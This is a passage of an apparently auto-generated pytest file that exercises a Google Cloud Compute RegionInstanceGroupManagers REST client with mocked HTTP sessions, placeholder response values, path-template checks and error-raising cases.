assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_apply_updates_to_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_apply_updates_request_resource"
] = compute.RegionInstanceGroupManagersApplyUpdatesRequest(all_instances=True)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.apply_updates_to_instances(request)
def test_apply_updates_to_instances_rest_from_dict():
test_apply_updates_to_instances_rest(request_type=dict)
def test_apply_updates_to_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_apply_updates_request_resource=compute.RegionInstanceGroupManagersApplyUpdatesRequest(
all_instances=True
),
)
mock_args.update(sample_request)
client.apply_updates_to_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/applyUpdatesToInstances"
% client.transport._host,
args[1],
)
def test_apply_updates_to_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.apply_updates_to_instances(
compute.ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_apply_updates_request_resource=compute.RegionInstanceGroupManagersApplyUpdatesRequest(
all_instances=True
),
)
def test_create_instances_rest(
transport: str = "rest",
request_type=compute.CreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_create_instances_request_resource"
] = compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.create_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_create_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.CreateInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_create_instances_request_resource"
] = compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.create_instances(request)
def test_create_instances_rest_from_dict():
test_create_instances_rest(request_type=dict)
def test_create_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_create_instances_request_resource=compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
),
)
mock_args.update(sample_request)
client.create_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/createInstances"
% client.transport._host,
args[1],
)
def test_create_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_instances(
compute.CreateInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_create_instances_request_resource=compute.RegionInstanceGroupManagersCreateInstancesRequest(
instances=[compute.PerInstanceConfig(fingerprint="fingerprint_value")]
),
)
def test_delete_rest(
transport: str = "rest",
request_type=compute.DeleteRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_delete_rest_bad_request(
transport: str = "rest",
request_type=compute.DeleteRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.delete(request)
def test_delete_rest_from_dict():
test_delete_rest(request_type=dict)
def test_delete_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.delete(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}"
% client.transport._host,
args[1],
)
def test_delete_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete(
compute.DeleteRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_delete_instances_rest(
transport: str = "rest",
request_type=compute.DeleteInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_delete_instances_request_resource"
] = compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete_instances(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_delete_instances_rest_bad_request(
transport: str = "rest",
request_type=compute.DeleteInstancesRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_managers_delete_instances_request_resource"
] = compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.delete_instances(request)
def test_delete_instances_rest_from_dict():
test_delete_instances_rest(request_type=dict)
def test_delete_instances_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_delete_instances_request_resource=compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
),
)
mock_args.update(sample_request)
client.delete_instances(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/deleteInstances"
% client.transport._host,
args[1],
)
def test_delete_instances_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_instances(
compute.DeleteInstancesRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_managers_delete_instances_request_resource=compute.RegionInstanceGroupManagersDeleteInstancesRequest(
instances=["instances_value"]
),
)
def test_delete_per_instance_configs_rest(
transport: str = "rest",
request_type=compute.DeletePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_delete_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(names=["names_value"])
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.delete_per_instance_configs(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_delete_per_instance_configs_rest_bad_request(
transport: str = "rest",
request_type=compute.DeletePerInstanceConfigsRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request_init[
"region_instance_group_manager_delete_instance_config_req_resource"
] = compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(names=["names_value"])
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.delete_per_instance_configs(request)
def test_delete_per_instance_configs_rest_from_dict():
test_delete_per_instance_configs_rest(request_type=dict)
def test_delete_per_instance_configs_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_delete_instance_config_req_resource=compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(
names=["names_value"]
),
)
mock_args.update(sample_request)
client.delete_per_instance_configs(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}/deletePerInstanceConfigs"
% client.transport._host,
args[1],
)
def test_delete_per_instance_configs_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_per_instance_configs(
compute.DeletePerInstanceConfigsRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
region_instance_group_manager_delete_instance_config_req_resource=compute.RegionInstanceGroupManagerDeleteInstanceConfigReq(
names=["names_value"]
),
)
def test_get_rest(
transport: str = "rest", request_type=compute.GetRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.InstanceGroupManager(
base_instance_name="base_instance_name_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
fingerprint="fingerprint_value",
id=205,
instance_group="instance_group_value",
instance_template="instance_template_value",
kind="kind_value",
name="name_value",
region="region_value",
self_link="self_link_value",
target_pools=["target_pools_value"],
target_size=1185,
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.InstanceGroupManager.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.InstanceGroupManager)
assert response.base_instance_name == "base_instance_name_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.fingerprint == "fingerprint_value"
assert response.id == 205
assert response.instance_group == "instance_group_value"
assert response.instance_template == "instance_template_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.target_pools == ["target_pools_value"]
assert response.target_size == 1185
assert response.zone == "zone_value"
def test_get_rest_bad_request(
transport: str = "rest", request_type=compute.GetRegionInstanceGroupManagerRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.get(request)
def test_get_rest_from_dict():
test_get_rest(request_type=dict)
def test_get_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.InstanceGroupManager()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.InstanceGroupManager.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {
"project": "sample1",
"region": "sample2",
"instance_group_manager": "sample3",
}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
mock_args.update(sample_request)
client.get(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers/{instance_group_manager}"
% client.transport._host,
args[1],
)
def test_get_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get(
compute.GetRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager="instance_group_manager_value",
)
def test_insert_rest(
transport: str = "rest",
request_type=compute.InsertRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.insert(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_insert_rest_bad_request(
transport: str = "rest",
request_type=compute.InsertRegionInstanceGroupManagerRequest,
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request_init["instance_group_manager_resource"] = compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
)
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.insert(request)
def test_insert_rest_from_dict():
test_insert_rest(request_type=dict)
def test_insert_rest_flattened(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1", "region": "sample2"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
region="region_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
mock_args.update(sample_request)
client.insert(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/regions/{region}/instanceGroupManagers"
% client.transport._host,
args[1],
)
def test_insert_rest_flattened_error(transport: str = "rest"):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.insert(
compute.InsertRegionInstanceGroupManagerRequest(),
project="project_value",
region="region_value",
instance_group_manager_resource=compute.InstanceGroupManager(
auto_healing_policies=[
compute.InstanceGroupManagerAutoHealingPolicy(
health_check="health_check_value"
)
]
),
)
def test_list_rest(
transport: str = "rest", request_type=compute.ListRegionInstanceGroupManagersRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.RegionInstanceGroupManagerList(
id="id_value",
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.RegionInstanceGroupManagerList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListPager)
assert response.id == "id_value"
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
def test_list_rest_bad_request(
transport: str = "rest", request_type=compute.ListRegionInstanceGroupManagersRequest
):
client = RegionInstanceGroupManagersClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1", "region": "sample2"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
